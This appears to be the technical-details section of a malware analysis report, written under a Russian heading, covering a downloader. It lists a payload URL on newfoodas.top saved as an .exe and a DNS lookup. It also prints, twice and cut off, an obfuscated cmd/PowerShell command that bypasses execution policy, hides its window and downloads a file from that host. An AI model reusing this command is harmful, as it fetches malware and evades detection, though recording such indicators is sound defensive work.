Техническая информация
- http://newfoodas.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PowE^rSh^ELL^.EXe^ -e^Xec^U^t^ioN^pOLIC^y^ b^yPAS^S -^nO^profile -WI^ND^o^w^sTYL^E H^iddEn^ ^(N^Ew-O^b^jECT s^yS^t^em.^nEt^.W^EbCL^iEN^T).DowN^LOADF^I^lE(^'http://newfoodas.top/read...
- DNS ASK ne###odas.top
- '<SYSTEM32>\cmd.exe' /c "PowE^rSh^ELL^.EXe^ -e^Xec^U^t^ioN^pOLIC^y^ b^yPAS^S -^nO^profile -WI^ND^o^w^sTYL^E H^iddEn^ ^(N^Ew-O^b^jECT s^yS^t^em.^nEt^.W^EbCL^iEN^T).DowN^LOADF^I^lE(^'http://newfoodas.top/read...' (со скрытым окном)